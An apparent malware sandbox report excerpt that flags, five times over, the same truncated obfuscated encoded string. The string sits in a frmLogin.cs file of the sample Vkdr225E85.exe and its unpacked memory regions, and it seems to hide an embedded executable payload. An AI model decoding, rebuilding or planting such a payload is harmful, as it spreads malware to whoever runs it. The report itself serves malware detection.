              Source: Vkdr225E85.exe, frmLogin.csBase64 encoded string: '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
              Source: 1.2.Vkdr225E85.exe.b80000.0.unpack, frmLogin.csBase64 encoded string: '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
              Source: 1.0.Vkdr225E85.exe.b80000.0.unpack, frmLogin.csBase64 encoded string: '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
              Source: 4.2.Vkdr225E85.exe.b70000.4.unpack, frmLogin.csBase64 encoded string: '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
              Source: 4.0.Vkdr225E85.exe.b70000.0.unpack, frmLogin.csBase64 encoded string: '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
